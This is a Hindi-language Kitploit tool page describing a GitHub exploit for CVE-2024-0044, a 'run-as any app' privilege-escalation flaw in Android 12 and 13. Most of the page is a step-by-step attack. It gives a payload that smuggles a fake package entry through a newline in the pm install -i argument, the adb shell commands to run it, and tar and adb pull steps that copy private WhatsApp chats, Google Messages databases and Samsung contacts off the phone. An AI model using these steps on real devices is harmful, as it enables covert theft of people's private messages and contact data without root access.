Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve_2024_0044 — CVE-2024-0044: Android संस्करण 12 और 13 को प्रभावित करने वाली "run-as any app" उच्च-गंभीरता भेद्यता | Kitploit
उपकरण/GitHubGitHub/k4ran909/cve_2024_0044
एंड्रॉइड सुरक्षाविशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणडेटा निष्कासनपोस्ट-शोषणपेनिट्रेशन टेस्टिंगमोबाइल सुरक्षा
GitHubk4ran909/cve_2024_0044

cve_2024_0044

CVE-2024-0044: Android संस्करण 12 और 13 को प्रभावित करने वाली "run-as any app" उच्च-गंभीरता भेद्यता

रिपॉजिटरी देखें
471 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE 2024 0044

CVE-2024-0044, जो PackageInstallerService.java फ़ाइल के createSessionInternal फ़ंक्शन में पहचाना गया है, एक उच्च-गंभीरता वाली कमजोरी है जो Android संस्करण 12 और 13 को प्रभावित करती है। यह कमजोरी हमलावर को "run-as any app" हमला करने की अनुमति देती है, जिससे उपयोगकर्ता की सहभागिता के बिना स्थानीय विशेषाधिकार वृद्धि होती है। यह समस्या createSessionInternal फ़ंक्शन के भीतर अनुचित इनपुट सत्यापन के कारण उत्पन्न होती है। एक हमलावर सत्र निर्माण प्रक्रिया में हेरफेर करके इसका शोषण कर सकता है, संभावित रूप से संवेदनशील डेटा तक अनधिकृत पहुंच प्राप्त कर सकता है और प्रभावित डिवाइस पर अनधिकृत कार्य कर सकता है।

इस शोषण की खोज Meta security ने की थी।

प्रूफ ऑफ कॉन्सेप्ट को Tiny hack द्वारा संक्षेपित और साझा किया गया था।

सुरक्षा पैच के बारे में विवरण Android security bulletin पर पाए जा सकते हैं।

पूर्वापेक्षाएँ

  1. अपने मोबाइल फोन में USB डिबगिंग सक्षम करें और इसे USB केबल या वायरलेस डिबगिंग का उपयोग करके अपनी मशीन से कनेक्ट करें।
  2. अपनी मशीन पर कोई भी APK डाउनलोड करें, आप F-DROID का उपयोग कर सकते हैं।

टूल का उपयोग कैसे करें

root@kitploit:~
python3 cve_2024_0044.py -h
                                                                               
##########################################################################################
###############S%%#####################################################%%S################
###############%++*S##################################################?++?################
################%++*S###############################################S*++?#################
#################%+++%#############################################S*++%##################
##################S*++%###########################################%+++%###################
###################S*++?#########SSS%%?????***?????%%%SS#########%++*S####################
#####################?++*##S%%?**+++++++++++++++++++++++**??%S##?++*S#####################
######################?++**+++++++++++++++++++++++++++++++++++**++*#######################
###################S%?*++++++++++++++++++++++++++++++++++++++++++++?%S####################
#################%?+++++++++++++++++++++++++++++++++++++++++++++++++++*%S#################
##############S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++?S###############
############S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S#############
##########S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S###########
#########%+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++?##########
#######S*+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S########
######%++++++++++++++*%SS%?+++++++++++++++++++++++++++++++++++?%SS%*++++++++++++++%#######
#####%++++++++++++++*######%+++++++++++++++++++++++++++++++++%######?++++++++++++++?######
####?+++++++++++++++*######S+++++++++++++++++++++++++++++++++%######?+++++++++++++++?#####
###%+++++++++++++++++*%SS%?+++++++++++++++++++++++++++++++++++?%SS%*+++++++++++++++++?####
##S+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++%###
##*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++S##
#%+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++?##
#*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++S#
S+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++%#      
        
usage: cve_2024_0044.py [-h] -P P -A A

CVE-2024-0044: run-as any app @Pl4int3xt

options:
  -h, --help  show this help message and exit
  -P P        package name (default: None)
  -A A        apk file path (default: None)

-P का उपयोग उस लक्ष्य पैकेज नाम को निर्दिष्ट करने के लिए किया जाता है जिसके रूप में आप चलाना चाहते हैं।

-A का उपयोग डिवाइस में पुश करने के लिए APK फ़ाइल निर्दिष्ट करने के लिए किया जाता है।

शोषण

टूल चलाएं: python3 cve_2024_0044.py -P com.whatsapp -A /home/pl4int3xt/Downloads/F-Droid.apk

इस प्रकार एक payload.txt फ़ाइल उत्पन्न होगी:

root@kitploit:~
PAYLOAD="@null
victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
pm install -i "$PAYLOAD" /data/local/tmp/F-Droid.apk

टूल कुछ भागों को स्वचालित करता है और अन्य भाग मैनुअल हैं। आप पेलोड उत्पन्न करने के बाद बाहर निकल सकते हैं और सभी कमांड मैन्युअल रूप से चला सकते हैं, या निर्देशों के साथ जारी रख सकते हैं।

इसके बाद आपको अपने डिवाइस से adb shell का उपयोग करके कनेक्ट करना होगा और पेलोड पेस्ट करना होगा, और सुनिश्चित करना होगा कि अंतिम कमांड के बाद आपको Success संदेश वापस मिले।

root@kitploit:~
pl4int3xt ~>  adb shell
pixel:/ $ PAYLOAD="@null
> victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
pixel:/ $ pm install -i "$PAYLOAD" /data/local/tmp/F-Droid.apk
Success

इसके बाद हम निम्नलिखित कमांड का उपयोग करके whatsapp डेटा प्राप्त करते हैं:

root@kitploit:~
pixel:/ $ mkdir /data/local/tmp/wa/                                                                            
pixel:/ $ touch /data/local/tmp/wa/wa.tar
pixel:/ $ chmod -R 0777 /data/local/tmp/wa/
pixel:/ $ run-as victim
pixel:/data/user/0 $ tar -cf /data/local/tmp/wa/wa.tar com.whatsapp

एक अस्थायी निर्देशिका बनाएं: mkdir /data/local/tmp/wa/

एक tar फ़ाइल के लिए प्लेसहोल्डर बनाएं: touch /data/local/tmp/wa/wa.tar

व्यापक-खुली अनुमतियां सेट करें: chmod -R 0777 /data/local/tmp/wa/ ताकि कोई भी उपयोगकर्ता इस निर्देशिका में पढ़, लिख और निष्पादित कर सके।

उपयोगकर्ता संदर्भ स्विच करें: run-as victim ताकि "victim" उपयोगकर्ता के समान अनुमतियां प्राप्त हो सकें।

लक्ष्य एप्लिकेशन के डेटा को संग्रहित करें: tar -cf /data/local/tmp/wa/wa.tar com.whatsapp, WhatsApp डेटा निर्देशिका का एक टारबॉल बनाना।

अंत में डेटा खींचें:

adb pull /data/local/tmp/wa/wa.tar

आप 7z या किसी अन्य टूल का उपयोग करके डेटा निकाल सकते हैं।

आप इसे HTML में बदलने के लिए Whatsapp chat exporter का उपयोग कर सकते हैं।

यह आपको अपने डिवाइस पर रूट एक्सेस के बिना whatsapp डेटा प्राप्त करने की अनुमति देता है।

Google Messages खींचना

बस पैकेज नाम इस प्रकार बदलें:

root@kitploit:~
plaintext@archlinux ~/D/c/p/cve_2024_0044 (feature)> python3 ./cve_2024_0044.py -P com.google.android.apps.messaging -A ~/Downloads/F-Droid.apk

उपरोक्त निर्देशों का पालन करें और wa.tar फ़ाइल खींचने के बाद इसे अनटार करें और com.google.android.apps.messaging/databases/bugle_db में वार्तालाप खोलें, sqlitebrowser या किसी अन्य टूल का उपयोग करें।

Contacts खींचना

Samsung डिवाइस के लिए परीक्षण किया गया। अन्य डिवाइसों के लिए contacts प्रदाता का पैकेज नाम जांचें।

root@kitploit:~
plaintext@archlinux ~/D/c/p/cve_2024_0044 (feature)> python3 ./cve_2024_0044.py -P com.samsung.android.app.contacts -A ~/Downloads/F-Droid.apk

उपरोक्त निर्देशों का पालन करें और wa.tar फ़ाइल खींचने के बाद इसे अनटार करें और com.samsung.android.providers.contacts/databases/contacts2.db में contacts खोलें, sqlitebrowser या किसी अन्य टूल का उपयोग करें। db फ़ाइल में contacts सूची के साथ सभी उपयोगकर्ता ईमेल खातों की जानकारी होती है।

टूल डाउनलोड करें